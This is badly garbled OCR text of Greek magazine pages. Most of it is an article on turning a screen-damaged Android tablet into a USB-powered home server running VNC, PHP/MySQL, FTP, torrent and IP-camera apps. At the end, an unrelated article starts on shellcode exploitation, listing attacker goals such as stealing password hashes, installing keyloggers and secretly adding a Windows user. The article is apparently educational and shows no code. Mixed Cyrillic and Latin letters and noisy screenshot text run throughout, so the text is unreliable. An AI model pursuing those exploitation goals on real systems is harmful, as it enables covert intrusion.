συσκευές µας; Ἡ τουλάχιστον ауто νομίζουμε αρχικά. Διότι η πεισµατώδης 
ενασχόληση µε ша συσκευἠ που δείχνει αχρηστευμένη µπορεἰ, av OX! va την 
επιδιορθώσει, να της προσδώσει µια νέα ζωή! 


Scrap tablet revival 
PPP 


Ta tablet αποτελούν τα δημοφιλέστερα gadgets της εποχἠς рас, yia χάρη των οποίων 
διακόπηκε και η παραγωγἠ των netbooks. Н μεγάλη αποδοχἠ rov tablets επιτεύχθηκε 
апо τις πάμπολλες και ιδιαίτερα оікоуоцікёс "κινέζικες" προτάσεις. Αυτές οι συσκευὲς 
δεν προσέφεραν την εμπειρία χρήσης rov ακριβότερων και ποιοτικὀτερων μοντέλων, 
αλλά επέτρεψαν στην πλειονότητα του κοινού να γευτεἰ τις δυνατότητες rou Android, 
µε ελάχιστο κόστος. Ta tablet, όμως, ὁπως κι ὁλες οι φορητές συσκευὲς, εἶναι επιρ- 
penn στα ατυχήματα που μπορεί να συμβούν ката τη µεταφορά τους. Μιλάμε για τις 
πτώσεις ἡ και τα ἄγαρμπα χτυπήματα, τα αποτελέσµατα των οποίων кораімоута апо 
éva απλὀ σημάδι μέχρι και την αχρήστευση της συσκευἠς. Σχεδὸν ;) Όπως катала- 
βαΐνετε, αυτή η λέξη δεν γράφτηκε τυχαία. Σ' αυτό ro άρθρο θα αποδείξουμε От! 
με λίγη φαντασία και μεράκι μπορούμε va ζωντανέψουμε Eva χτυπημένο tablet που 
μοιάζει ахрпото, και να του δώσουμε νέα ζωὴ! 


Πρόσφατα ¿neoe στα χέρια µας Eva noname tablet, ο κάτοχος του οποίου το продрі- 
Ze για τον κἄλαθο των αχρήστων. Το ἄτυχο tablet, βλέπετε, εἶχε υποστεί µια μοιραία 
πτώση που κατέστρεψε την οθὀνη ολοσχερώς. Το κόστος για την αντικατάσταση της 
οθόνης σε σύγκριση µε ro κόστος για την απὀκτηση rou tablet ἦταν αρκετά μεγαλὺ- 
τερο(!), οπότε η επιδιόρθωση ἧταν ασύμφορη. Έτσι, ὅταν ο απογοητευμένος като- 
χος της συσκευἠς αποφάσισε va µας то παραχωρῆσει, αρχίσαμε να επεξεργαζὀµαστε 
εναλλακτικἁ σχέδια για την αξιοποἰησὴ του. Μια πρὠτη σκέψη ἦταν η σύνδεση του 
tablet µε την τηλεόραση του σαλονιού, µέσω της ενσωματωμένης θύρας micro- 
HDMI. Αυτό nou εἰχαμε σκεφτεί ἦταν va το χρησιμοποιήσουμε oc Android TV Box. 
Ωστόσο η θύρα HDMI αρνούνταν пеіснатіка va εξάγει σήμα προς την τηλεόραση. 
Ката паса πιθανότητα, ο αρχικός TOU κάτοχος εἶχε απενεργοποιήσει τη σχετικἠ ρύθ- 
шоп και χωρὶς την οθὀνη ἦταν δύσκολο να κάνουμε κάτι ү αυτὸ. Έτσι αποφασἰσαµε 
να αλλάξουμε πορεία δράσης. 


O βασιλιάς εἶναι γυμνός 


Mia апо τις επόμενες σκέψεις που κάναμε ἦταν η μετατροπή rou tablet σ' ¿vav 
server μικρής ισχύος και συνάμα χαµηλἠς κατανάλωσης. Κάτι σαν ro Raspberry Рі, 
δηλαδή. Αυτό nou µας προβλημάτιζε, орос, ἦταν ro θέμα της υπερθέρμανσης της 
μπαταρίας. ‘Eva σύστημα σαν αυτό που εἰχαμε φανταστεἰ έπρεπε να εἶναι σε θἐση 
να λειτουργεἰ αδιάκοπα και va µη χρειάζεται επανεκκίνηση каде λίγο. Κάπως ἐτσι 
αποφασίσαμε να αφαιρέσουμε το "καβούκι" της συσκευής, WOTE να καταφέρουμε 
ν' απαλλαγούμε апо τα κατεστραμμένα και ἄχρηστα πλέον εξαρτήματα (digitizer 
και οθόνη). Ξεβιδώνοντας τις μικροσκοπικὲς βίδες στην πίσω πλευρά του tablet, 
το ἄνοιγμα της συσκευἠς κατέστη ιδιαίτερα εὐκολο. Έτσι µπορέσαµε va αποσυν- 
δέσουµε την οθὀνη του αμέσως. О αρχικός προβληματισμός, орос, εξαιτίας του 
οποίου ανοἰξαµε τη συσκευἠ, εἰχε να κάνει µε τη μπαταρία. Θα μπορούσε арауе va 
λειτουργήσει ro tablet µε εξωτερικἠ τροφοδοσία апо κάποια ἄλλη πηγἠ και χωρἰς τη 
μπαταρία; Αυτή η anopia пас ὠθησε va συνδέσουμε εκ νέου την οθὀνη. Φυσικά δεν 
αποφασίσαμε va παραιτηθούµε των προσπαθειών µας, αλλά θελήσαμε να κἄνουμε 
μερικὲς δοκιμές. Σκεφτήκαμε Ori αν και η οθόνη εἶχε καταστραφεί, ro backlight θα 
αποτελούσε ша καλὴ ἐνδειξη yia то av η συσκευἠ λειτουργεἰ ἡ ὀχι. 


Н πρὠτη απὀπειρα μετὰ την αποσύνδεση της μπαταρίας ἦταν αποτυχημένη και £ni- 
βεβαἰωνε ὁσα εἰχαμε διαβάσει апо 'δὠ κι апо 'кеі στο Διαδίκτυο. Σ' αυτἠ την npo- 
σπάθεια εἰχαμε αξιοποιήσει το βύσμα φὀρτισης που διέθετε η συσκευή και το οποίο 
ἐμοιαζε µε εκεϊνο των κινητῶν της Nokia. Λίγο πριν απογοητευτούµμε πλήρως και 
επανασυνδέσουµε τη μπαταρία, σκεφτήκαμε кат! ακόμα: Н συσκευἠ διέθετε και µια 
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H συσκευἠ µας, απογυμνωμένη απ’ óÀa та перітта υποσυστήμα- 

τα, μοιάζει µε то νεκρὀ απομεινἀρι ενός τεχνολογικού θαύματος. 

Μη σας ξεγελἀ η ὀψη της όμως! Με λίγο μεράκι κι επιμονή да της 
δώσουμε νέα πνοή ζωής... 


υποδοχἠ mini-USB yia τη σύνδεση µε υπολογιστή. Oc γνωστὸν, oi θύρες USB δεν 
μεταφέρουν µόνο δεδομένα алла και ρεύμα! Έτσι, βρήκαμε Eva трофоботіко στα 
5V µε καλώδιο USB, προσαρτήσαμε Eva μετατροπέα σε mini-USB και πραγµατο- 
ποιήσαμε τη σύνδεση. Με μεγάλη µας χαρά διαπιστώσαμε бт! το tablet ἄρχισε va 
λειτουργεί. Ομολογουμένως αισθανθἠκαµε αρκετά τυχεροί, αλλά η ayovia µας δεν 
υποχώρησε. Па τη συνέχεια των πειραματισμώὼν απαιτούνταν η σύνδεση rou tablet 
H£ TOV υπολογιστή, µέσω της θύρας USB. Θα μπορούσε арауе то ρεύμα της OXETIKNG 
θύρας rou υπολογιστἠὴ να τροφοδοτήσει το tablet; Χωρίς να χάσουμε каро праүра- 
τοποιήσαμε ша бокд και τα αποτελέσµατα µας ενθουσἰασαν. Το μικρὸ και σχεδὀν 
κατεστραμμένο tablet μπορούσε να λειτουργήσει афоуа µε το ρεύμα της θύρας 
USB, σε каде περίπτωση. 


Мета апо астёс τις δοκιμές, η οθόνη, το κύκλωμα ελἐγχου της αφἠς (digitizer) και η 
μπαταρία ἦταν πλέον ἀχρηστα κι απομακρύνθηκαν. Το ἰδιο συνέβη και µε ro KGBOUKI 
TOU tablet. Ουσιαστικά, GUTO που απέμεινε ἦταν η πλακέτα της συσκευἠς, µε TIG 
каререс και την кераіа rou WiFi. 


"Eva фіЛос απ' τα παλιά 


Με ra рпаукабіа µας γεμάτα хара κι αισιοδοξία περάσαμε στην επὀµενη πρὀκληση. 
Διαθέταμε Eva "ακέφαλο" μηχάνημα, ro опоіо μπορούσε να επικοινωνήσει µε το πε- 
ριβάλλον αποκλειστικἁ μέσα апо τη θύρα USB. Пос θα μπορούσαμε να χειριστούμε 
µια τέτοια συσκευἠ; 


36 


Scrap tablet revival 
MP 


Αρχείο Προβολή Πρόσθετα 


[4 кем EEG 


Επαφές τηλεφώνου 


е кы зе У oro 


Ovopotenmvupo ^ Κινητό Εργασία 


[E] Ρυθμίσεις 


Σύνδεση 


Εκκίνηση 


᾽ Τύπος τηλεφώνου 
Εμφάνιση © Τηλέφωνο SonyEricsson µε περιβάλλον μόντεμ Δείγμα 
Συμπεριφορά (9) Τηλέφωνο µε λειτουργικό Android Δείγμα 
Συγχρονισμός 
Πολύ-συγχρονισμός й 
Πρόσθετα 1 O WiFi 
Πρόσθ 2 | С) Bluetooth 

ida © Καλώδιο USB 
© Σταθερή διεύθυνση 
© Αυτόματη αναγνώριση 


“Ὁ Ατζέντα 


Σύνδεση με... 
Βοήθεια 


Αρχεία 


[7] дпгугрүопоіпоп αυτόματης σύνδεσης/αποσύνδεσης. 
Αποσύνδεση έπειτα aré 5 λεπτά απραξίας 
[V] Καταγραφή σφαλμάτων 


Προβολή αρχείου καταγραφής. | Αναζήτηση συσκευής 


| οἱ }[ Ακώρωση | 


< Το τηλέφωνο συνδέθηκε: and Καλώδιο USB 


Пера апо τα λεγόμενα "feature phones" της Sony 
Ericsson, το MyPhoneExplorer υποστηρίζει και συσκευές 
µε Android. Επιπρὀσθετα, υποστηρίζει όλους τους кЛа- 
σικούς τρόπους σύνδεσης (WiFi, USB και Bluetooth). 


Н прота ιδέα ἦταν να χρησιμοποιήσουμε To ADB, το εργαλεὶο yia ro debugging των 
OUOKEUWV που τρέχουν Android. To εν λόγω проурарна επιτρέπει τη διαχείριση µιας 
συσκευἠς апо τη γραμμή εντολών TOU υπολογιστὴ μας κι επομένως, θα μπορούσαμε 
να το χρησιμοποιήσουμε ὥστε ν' αποκτήσουμε πρόσβαση στο σύστημα του tablet. 
Ενδεχομένως, θα μπορούσαμε ακόμα και να εγκαταστήσουµε εφαρμογές! Н ιδέα 
του ADB ἠταν αρκετά калд, αλλά την εγκαταλείψαμε αμέσως órav θυμηθήκαμε 
то MyPhoneExplorer. Πρόκειται για ἑνα πρὀγραµµα nou χρησιμοποιούσαμε палаі- 
ὀτερα και το οποίο προσέφερε τεράστια ευκολία στη διαχείριση των κινητῶν της 
SonyEricsson. Μεταξύ ἄλλων, ro MyPhoneExplorer παρείχε τη δυνατότητα λήψης 
screenshot апо το σύστημα του κινητού. Επιπρὀσθετα, επέτρεπε τον πλήρη ἐλεγχο 
της συσκευἠς, εμφανίζοντας μέσα στο περιβάλλον του όλα ra κουμπιά και τα πάσης 
φύσεως "χειριστήρια" του κινητού. E, λοιπὸν, µε µια αναζήτηση στο Διαδίκτυο δια- 
πιστώσαμε бт! το συγκεκριµένο πρὀγραμμα υπήρχε ακόμα, αναπτυσσόταν διαρκὠς 
και εἶχε επεκταθεἰ WOTE να υποστηρίζει και συσκευὲς µε ro Android! Όπως avriAau- 
βάνεστε, το κατεβάσαμε αμέσως (www.fjsoft.at) και το εγκαταστήσαμε. О μόνος 
δισταγµὀς NOU εἰχαμε αφορούσε στον τρόπο διασύνδεσης µε την εκάστοτε συσκευή. 
To MyPhoneExplorer, βλέπετε, NEPA апо τη Φυσική σύνδεση µε TN συσκευἠ, anal- 
тобок την επιβεβαίωση του χρήστη ὁτι επιθυμούσε τον απομακρυσμένο ἐλεγχο του 
κινητού. Πώς Ва γινόταν αυτό, εφόσον To tablet δεν διέθετε την οθόνη του; 
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V HAGKER 


Ва аа 


ма met [Г] Hide pre-installed applications 
k. Επαφές 


Επαφές τηλεφώνου 


Εφαρµογή Έκδοση Μέγεθος Εγκαταστάθηκε 
Ημερολόγιο ).4-20120824 1,07 MB 28/11/2012, 14:33 
Θέση δικτύου 1108 264,76 KB 28/11/2012, 14:33 

| ‹ D Κλήσεις ° Apis I . )4-20120824 149,44 KB 28/11/2012, 14:33 
Μήνυμα ηλεκτρονικού ταχυδρομεί... 41 2,74 MB 28/11/2012, 14:33 

VE Μουσική )4-20120824 64470 KB 28/11/2012, 14:33 

Ὁ Ατζέντα 9g Παράγοντας σχολίων Market 4.0.4-255454 125,32 KB 28/11/2012, 14:33 
Πλαίσιο Υπηρεσιών Google 4.0.4-255454 983,46 KB 28/11/2012, 14:33 

Πληκτρολόγιο Android ),4-20120824 1,35 MB 28/11/2012, 14:33 

Πρόγραμμα διαχείρισης λήψεων )4-20120824 448,78 KB 28/11/2012, 14:33 

Πρόγραμμα εγγραφής ήχου )4-20120824 87,30 KB 28/11/2012, 14:33 

Πρόγραμμα εγκατάστασης πακέτου ).4-20120824 193,58 KB 28/11/2012, 14:33 

a Πρόγραμμα εγκατάστασης motor... ).4-20120824 119,36 KB 28/11/2012, 14:33 

Sp Карта лиле Πρόγραµµα ενημέρωσης Market 10 12,08 KB 28/11/2012, 14:33 

ae DEL runs Πρόγραμμα προβολής HTML )4-20120824 11,57 KB 28/11/2012, 14:33 
Εφαρμογές Ρολόι 203 561,38 KB 28/11/2012, 14:33 
Ρυθμίσεις ).4-20120928 6,49 MB 28/11/2012, 14:33 
Ρύθμιση δικτύου κιν. τηλεφωνίας )4-20120824 103,78 KB 28/11/2012, 14:33 
Συγχρονισµός Επαφών Google 4.0.4-255454 132,08 KB 28/11/2012, 14:33 
Συγχρονισμός Ημερολογίου Google 4.0.3-239410 140,42 ΚΒ 28/11/2012, 14:33 
Συλλογή 1.1.30682 1,96 MB 28/11/2012, 14:33 
Σύστημα Android ).4-20120824 8,34 МВ 28/11/2012, 14:33 
Υπηρεσίες Exchange 41 805,27 КВ 28/11/2012, 14:33 
Χώρος αποθήκευσης επαφών )4-20120824 592,01 KB 28/11/2012, 14:33 
Χώρος αποθήκευσης µέσων )4-20120824 70,43 KB 28/11/2012, 14:33 
Φωνητική αναζήτηση 211 2,08 MB 27/1/2012, 15:54 
Adobe Flash Player 11.1 11.1.112.60 4,49 MB 27/11/2012, 15:49 
droid VNC server 11560 1,99 MB 1/1/2010, 02:21 
MyPhoneExplorer Client 1026 683,77 KB 1/1/2010, 02:07 
Φωτογ.μηχανή x 2,70 KB Καμία ένδειξη. 


< Το τηλέφωνο συνδέθηκε: από Καλώδιο USB 


Є, 
^" Άλλα 


ΟΙ ефариоуёс που εἶχαν εγκατασταθεί στο пала! ποτὲ tablet, 
όπως εμφανίζονται oro MyPhoneExplorer. Από την ἰδια περιοχή 
του προγράµµατος μπορούμε va εγκαταστήσουµε και πρὀσθετες 
εφαρμογές, που βρίσκονται στον υπολογιστή µας. 


Апо την Kiva µε αγάπη! 


Τρέχοντας το MyPhoneExplorer yia πρώτη фора, μας ζητήθηκε να επιλέξουμε TOV 
τύπο της συσκευἠς και το μέσο επικοινωνἰας μ' αυτή. Οι упостпрісдрехоі τύποι συ- 
σκευἠς εἶναι δύο: Συσκευἠ µε λογισμικό SonyEricsson και συσκευἠ ue Android. Τα 
υποστηριζὀμενα "κανάλια" επικοινωνίας εἶναι τρία: WiFi, Bluetooth ἡ USB. Εμεἰς επι- 
Аё ане τον τελευταἰο τύπο σύνδεσης και, αφού συνδέσαμε το tablet στον υπολογι- 
OTN, διαπιστώσαμε µε хара óri το MyPhoneExplorer συνδέθηκε αμέσως και µε επιτυ- 
xia. Па καλἠ µας τύχη, βλέπετε, ο кіуёсос κατασκευαστὴἠς eixe αφήσει ελεύθερη την 
πρὀσβαση στη συσκευὴ και μάλιστα µε δικαιώματα root. Έτσι, το MyPhoneExplorer 
απέκτησε πλήρη πρόσβαση στις λειτουργίες της συσκευής, χωρὶς να χρειαστεἰ ка- 
ποια επιβεβαίωση апо μέρους µας. Σε αυτό το σημείο εἰχαμε σταθεἰ εξαιρετικἁ TU- 
χεροὶ :D 


Το περιβάλλον του MyPhoneExplorer επιτρέπει την περιήγηση στο file system 
της συσκευἠς, την εγκατάσταση εφαρμογών και διάφορα ἄλλα. Εμεὶς ὁμως δεν 
ασχοληθήκαµε µε τίποτε ап' αυτά. О κύριος Aóyog yia τον οποίο καταφύγαμε στο 
MyPhoneExplorer ἦταν η δυνατότητα πρὀσβασης στην "επιφάνεια εργασίας" του 
λειτουργικού συστήματος rou tablet. Αυτή η λειτουργία παρέχεται апо το μενού 
"Πρόσθετα", ónou πρέπει να επιλέξουμε το "Πληκτρολόγιο τηλεφώνου / Φόρτωση 
εικόνας οθὀνης". Κάνοντας κλικ στη συγκεκριμένη επιλογή, ανοίγει Eva παράθυρο 
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< Το τηλέφωνο συνδέθηκε: από Καλώδιο USB Е cu 


О λόγος που εγκαταστήσαμε ro MyPhoneExplorer δεν 
ήταν ἆλλος апо τη δυνατότητα προβολής της епіфаусіас 
εργασίας του λειτουργικού συστήµατος Tou tablet. 


µε την "επιφάνεια εργασἰας" της συσκευἠς. Μπορούμε ETO! να αλληλεπιδράσουµε µε 
το περιβάλλον του λειτουργικού της συστήματος, ре TO NOVTIKI και το πληκτρολόγιο 
του υπολογιστὴ µας. 


Δικτυακός ἐλεγχος 


Αφού καταφέραμε ν' αποκτήσουμε πρόσβαση στο περιβάλλον rou Android, το npo- 
το πράγμα που κάναμε ἠταν να ενεργοποιήσουμµε το WiFi και va συνδεθούµε στο 
δίκτυο µέσω του router µας. Αμέσως μετὰ ξεκίνησε η αναζήτηση шас ефарроўйс 
που θα епётрепе την απομακρυσμένη διαχείριση της συσκευής µέσω δικτύου, XW- 
pic τη μεσολάβηση rou MyPhoneExplorer και γενικότερα xopic την ανάγκη άμεσης 
σύνδεσης µε κάποιον υπολογιστή (µέσω Bluetooth ἡ USB). Με λίγα λόγια, αναζη- 
тойсан ша υλοποίηση του συστήματος VNC (Virtual Network Computing), σαν το 
δημοφιλὲς TeamViewer. Παρεμπιπτόντως, αν και το προαναφερθὲν εργαλεὶο εἶναι 
ιδιαίτερα εὐχρηστο, κρίθηκε ακατάλληλο για £vav απλούστατο λὀγο: Επιτρέπει τον 
ἐλεγχο απομακρυσμένων υπολογιστών “апо” το tablet και ὀχι το αντίστροφο! To 
ἰδιο ισχύει και για αρκετά ακόµα προγράµµατα του εἰδους, που λειτουργούν μόνον 
ως client κι ὀχι ως server. 


Περιττὸ να πούμε OT! στον κόσμο του Linux υπάρχουν πολλά εργαλεία nou λει- 
τουργούν κι ως server. Επομένως, στον κόσμο του Android δεν θα μπορούσε να 
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УНАФКЕ 


ANN 


Оэзо» vic 


Connect to 
192.168.1.16:5901 
or 
http://192.168.1.16:5801 


O droid VNC server σε λειτουργία. Σημειώνουμε τη διεύθυνση IP και τη 
σχετική δικτυακή θύρα, ανοίγουμε Evav VNC client στον υπολογιστή, 
εισάγουµε Τα στοιχεία που σημειώσαμε προηγουμένως και τελειώσαμε! 
Μπορούμε, πλέον, να κλείσουμε ro MyPhoneExplorer οριστικά! 


μην ισχύει кат! ανάλογο. Με µια γρήγορη αναζήτηση oro Google Play εντοπἰσαµε 
το "droid VNC server", Πρόκειται για Eva δωρεὰν πρὀγραμμα Ανοιχτού Κώδικα το 
οποίο κάνει ὁλα ὁσα ζητούσαμε, evo παρέἑχει και τη δυνατότητα αυτόματης εκκἰνη- 
σης μαζὶ µε το σύστημα. Мета την εγκατἀστασὴ rou στο tablet, το ξεκινήσαμε και 
μεταβήκαμε στις ρυθμίσεις του για ¿vav γρήγορο ἐλεγχο. Στη συνέχεια στραφήκαμε 
στον ібіо τον υπολογιστἠ µας, ónou και τρέξαμε τον αγαπημένο нас VNC client?. Εκεὶ 
δώσαμε τη διεύθυνση IP rou tablet (аот oro τοπικὀ δίκτυο) και τη δικτυακἠ θύρα 
στην опоіа "ακούει" то droid VNC server. Н σύνδεση πραγματοποιήθηκε αμέσως και 
στο παράθυρο rou VNC client εμφανίστηκε η "επιφάνεια epyaoiac" rou Android. Σε 
αυτό το στάδιο μπορούσαμε πλέον va ξεφορτωθούμε то MyPhoneExplorer. 


Μετατροπή σε server 


Ἐχοντας βρει ἑναν εὐχρηστο τρόπο ελἐγχου του tablet, μπορούσαμε επιτέλους να 
προχωρήσουμε σε nio ενδιαφἐροντα ζητήματα. Eixe φτάσει η opa va εγκαταστή- 
coupe το AOYIOUIKO nou θα μετέτρεπε την πλακέτα µε ro Android σε Evav μικρὸ 


1. URL εφαρµογής oro Google Play: https://play.google.com/store/apps/details?id=org.onaips.vnc 
2. Υπάρχουν аркетёс υλοποιήσεις. Alo апо τις πιο διάσημες εἶναι то λιλιπούτειο TightVNC кі ο υπερπλήρης ογκόλιθος UltraVNC! 
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V2 Android - VNC Viewer 


Ρυθμίσεις 


Ξξ Αποθηκευτικός χώρος 


Μπαταρία 
Е Ενημερώσεις συστήµατος 
Εφαρμογές 
ΠΡΟΣΩΠΙΚΟΣ Κατάσταση 


; Н κατάσταση της рпатаріас και του δικτύου, καθώς και 
co I 
~ Λογαριασμοί & συγχρον άλλες πληροφορίες 


€ Υπηρεσίες τοποθεσίας Νομικές πληροφορίες 


& Ασφάλεια | ; 
Αριθµός μοντέλου 
[ Γλώσσα και εισαγωγή MID8018 


Э Αντίγραφα ασφαλείας | Εκδοση Android 
4.0.4 
ΣΥΣΤΗΜΑ 
Εκδοση βασικού φάσματος 


© Ημερομηνία και wea 15 


¥ Προσβασιμότητα Εκδοση Kernel 


А 3.0.8+ 
() Επιλογές για проүрарр pshu@INGENIC-CROSS #26 
Fri Sep 28 10:08:40 CST 2012 


Αριθµός έκδοσης 


Η επιφἀνεια εργασίας του λειτουργικού συστήµατος της 
συσκευής µας, όπως φαίνεται μέσα апд το παράθυρο του VNC 
client στον υπολογιστή. О χειρισμός µε то поутікі Kal TO πλη- 
κτρολὀγιο επιτυγχάνεται χωρίς το παραμικρό πρόβλημα! 


server. Τα απομεινάρια rou tablet θα αποκτούσαν διάφορες апостолёс στο τοπικὀ 
μας δίκτυο και θα "ξεφόρτωναν" τις πλάτες του μικρού µας Raspberry Рі. 


Μια σχετικἀ απλἠ εργασία εἶναι ro τοπικὀ "σερβίρισμα" των ιστοσελίδων και των 
δικτυακών εφαρμογών nou αναπτύσσουμε. Па TO OKONO QUTO εγκαταστἠσαµε την 
εφαρμογἠ DroidPHP, που ομοιάζει µε то LAMP stack. Αποτελεϊ εγχείρημα Avol- 
XTOU Λογισμικού και εγκαθιστά το διερμηνέα της PHP, τη MySQL και τον ανάλαφρο 
Lighttpd. Όπως кі o droid VNC server, ἐτσι kai το DroidPHP υποστηρίζει την αυτό- 
µατη εκτέλεση ката την εκκίνηση του συστήματος. Μπορείτε να κατεβάσετε την 
τελευταἰα ἐκδοση του DroidPHP апо τη διεύθυνση http://droidphp.github.io. Ефӧ- 
σον εἶχαμε μετατρέψει ro πρὠην tablet σε vav web server, λογικά επόμενο ἠταν 
να προσθέσουμε кі Evav FTP server yia την εὐκολη μεταφορὰ αρχείων. Στο Google 
Play βρήκαμε µια εὐχρηστη και δωρεάν υλοποίηση, µε το (πολύ πρωτότυπο) ὀνομα 
FTPServer®. Н ευκολία nou προσφέρει το FTP στη µεταφορά αρχείων οδήγησε τη 
σκέψη µας και σε µια ακόμα υπηρεσία. Пат! να µην μετατρέψουμµε το пало tablet kai 
σε torrent box; Με αυτόν rov τρὀπο θα απαλλάσσαμε то Raspberry Рі апо uia ακόµα 
εργασία. Εγκαταστήσαμε, λοιπὀν, το yvwoTo BitTorent Sync*. Με астёс τις απλὲς 


3. URL εφαρµογής στο Google Play: https://play.google.com/store/apps/details?id -lutey.FTPServer 
4. URL εφαρµογής oro Google Play: https://play.google.com/store/apps/details?id=com.bittorrent.sync 
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УНАФКЕЕ 


ANNL 


DroidPHP Z MENU 


Document Root: /mnt/sdcard/htdocs 
URL : http://localhost:8080 

mySQL User :root 

mySQL Password :word 


Server Management 


Start Server Kill Server 


Н κύρια οθὀνη του DroidPHP εμφανίζει τις πιο κρίσιµες πληροφορίες για τη λειτουργία 
του web server. Ano то ἰδιο παράθυρο μπορούμε να εκκινήσουµε και να τερµατίσουµε 
τη λειτουργία του, ενώ πατώντας το κουμπί Menu αποκτάµε πρόσβαση στο σύνολο των 
διαθέσιμων ρυθμίσεων. 


κινήσεις, η πλακέτα µε ro Android εἶχε μετατραπεί σε VNC, FTP και web server, ενώ 
λειτουργούσε κι ως "κατεβαστήρι"! Φυσικά, για την τελευταία λειτουργία χρειάστηκε 
να προσθέσουμε και µια карта SD µε άφθονο хоро. 


",..E£po δυο μάτια γαλανὰ..." 


Αν και η ζἐστη εἶναι αμείλικτη, γεγονὸς που δεν µας αφήνει ανεπηρέαστους, δεν 
τρελαθήκαμε, οὐτε αρχίσαμε va απαγγἐλουµε το γνωστὸ (;) τραγούδι της Τζένη 
Bavou. Πολὺ апла, ἐχοντας καταφέρει va αναστήσουμε ro χτυπημένο tablet και να 
ξεπεράσουμε αρκετὲς αναποδιὲς, δεν μπορούσαμε να βρούμε ησυχία. Θέλαμε va 
εκμεταλλευτούμε ακόµα και το τελευταίο λειτουργικό κύκλωμα που εἰχε απομείνει. 
AUTO µε το οποίο δεν εἰχαμε ασχοληθεἰ καθόλου, ἦταν οι δύο κάμερες: Н κύρια Kå- 
μερα στην πίσω πλευρά και η δευτερεύουσα στην πρὀσοψη. Έτσι, σκεφτήκαμε бт! 
εφόσον η συσκευἠ 8a ἠταν μονίμως δικτυωμένη, θα μπορούσε να προσφέρει μία 
ακόµα υπηρεσία: Εκείνη της απομακρυσμένης εποπτείας ενὸς χώρου του σπιτιού 
μας! Μεταβήκαμε λοιπὸν ξανὰ στο Google Play κι εγκαταστήσαμε την εφαρμογὴ IP 
Webcam’. Όπως δηλώνει και T' ὀνομά της, η συγκεκριμένη εφαρµογἠ μπορεί va µε- 
τατρέψει την απλἠ κάμερα ενὀς tablet ἡ smartphone σε µια παραμετροποιήσιμη IP 


5. URL εφαρμογἠς στο Google Play: https://play.google.com/store/apps/details?id=com.pas.webcam 
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= FTPServer (192.168.1.16:8021) - 0 sessions 


Stop FTP service Close GUI 


FTPServer 2.9.1 (66) 


lala d. 


To σπαρτιάτικο περιβάλλον rou FTPServer εμφανίζει τις απολύτως βασικές πληροφορίες για 
τη λειτουργία του. Οι ρυθμίσεις rou server βρίσκονται στο μενού της εφαρµογής. 


camera. Μάλιστα, η ἰδια εφαρµογή ενσωματώνει ἐναν μικρὸ web server кі Eva web 
interface, MOTE ο ἐλεγχος της карерас να πραγματοποιείται πανεύκολα. 


Boup στη θάλασσα! 


Пара τους αρχικούς µας ενδοιασμούς και σε πεἰσμα των εκτιμήσεων nou διαβάζαμε 
σε διάφορα fora, τα απομεινάρια rou tablet ox! μόνο κατάφεραν να επιβιώσουν αλλά 
βρήκαν και ша θέση ανάμεσα στις υπόλοιπες ηλεκτρονικὲς µας συσκευές. To tablet 
που λἰγο ἐλειψε va βρεθεἰ στα σκουπίδια (Σ.τ.Ε. Ἡ στην ανακύκλωση :D), λειτουργεὶ 
αρκετὲς μέρες тора, ακατάπαυστα και µε μηδαμινὲς еуерувіакёс απαιτήσεις. Н фа- 
vraoia, n ὀρεξη για περιπέτεια алла και η τύχη, µας βοήθησαν va µετατρέψουμε την 
σμπαραλιασμένη συσκευἠ σε Eva ζωντανὸ και δραστήριο μέλος του δικτύου µας. 
Тора, πλέον, εντελὠς αποφορτισμένοι апо τους τεχνολογικούς προβληματισμούς, 
µε αναπτερωμὲἑνο ηθικὀ και διάθεση, νομἰζουμε μπορούμε va επιδοθούµε σ' QUTO 
που рас калі η εποχή... 


Καλὲς βουτιἑς! 
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Τα shellcodes, αλλά στην πράξη! 


Στο άρθρο που αρχίζει апо τη σελίδα 24 του παρόντος δείχνουμε πὼς 
καλούμε µια συνάρτηση ενὸς executable, τη στιγµή nou η δοµἠ του 
προγράµµατος ουσιαστικά την αφήνει εκτὸς pons εκτέλεσης. Н προσπάθειά 
μας στέφεται µε επιτυχία χάρη στην τεχνική του stack overflow nou 
επιστρατεύουμε, αλλά то νου σας: Oi attackers και oi pen-testers δεν 
εργάζονται TOI — ὀχι σε αληθινά σενάρια. 


Та shellcodes, αλλά στην праёп! 
PPP 


AUTO nou ενδιαφἑρει ὁποιον επιδιώκει ro exploitation £vóc bug o' Eva проурарна ἡ 
υπηρεσία, δεν εἶναι τόσο να καλέσει kánoia "κρυφή" συνάρτηση στον κὠδικα. Avri- 
θετα, ψάχνει για £vav τρόπο που θα του επιτρέψει να εκτελέσει συγκεκριμένο κὠδι- 
κα προκειµένου ν' αποκτήσει root access στο (απομακρυσμένο ἡ τοπικὀ) σύστημα. 
Εναλλακτικά, avri να πάρει root access ἰσως θελήσει... 


ο να φτιάξει Eva νέο λογαριασμὀὸ χρήστη oro λειτουργικὸ ONOU φιλοξενείται то 
ευπαθὲς (vulnerable) πρὀγραμμα ἡ υπηρεσία 


е να ενεργοποιήσει ша ἡ περισσότερες δικτυακὲς υπηρεσίες, φροντίζοντας va 
μην περιορἱζονται апо ro опоо firewall 


e να πάρει ra password hashes όλων των χρηστῶν του συστήματος 


е να εγκαταστήσει Eva біко TOU πιστοποιητικὀ στη λίστα µε Ta ἐγκυρα πιστοποι- 
птіка του προκαθορισµένου web browser 


е у' ανεβάσει στο σύστημα капою проүрарра παρακολούθησης, ὁπως, N.X., 
ἑναν keylogger 


Oa μπορούσαμε να συνεχίσουμε ue τη Ліста, αλλά νοµἰζουµε бт! ἠδη περάσαμε то 
μύνημά µας: Με δεδομένο κάποιο bug nou ετοιµαζόμαστε να εκμεταλλευτούμε, avri 
να επιδιώξουµε την ανακατεύθυνση της ροής εκτἐλεσης στο EntryPoint µιας συνάρ- 
τησης (ñ κάπου αλλού μέσα στο executable, τέλος πάντων) συχνὰ θέλουμε апла va 
τρέξουµε ἄλλον, ενδεχομένως δικὀ µας, κὠδικα. 


Тора, yia να γίνει GUTO περισσότερο κατανοητὀ, εννοεἶται πως θα κάνουμε τους 
πειραματισμούς και τις επιδείξεις µας. Πιο συγκεκριµένα, το παράδειγµα που θ' aKo- 
λουθήσει уіуетаі σε біко µας σύστημα. Ασχολούμαστε, μ' алла λόγια, µε το λεγὀ- 
evo local кі όχι µε το remote exploitation. Σκοπὀὸς µας εἶναι να φτιάξουμε vav 
καινούργιο χρήστη σ' Eva σύστημα Windows, βεβαίως εν αγνοία του διαχειριστή. 
Δείτε, σχηματικά, τι θέλουμε να κάνουμε. Έχοντας το προγραμματάκι του ἄρθρου 
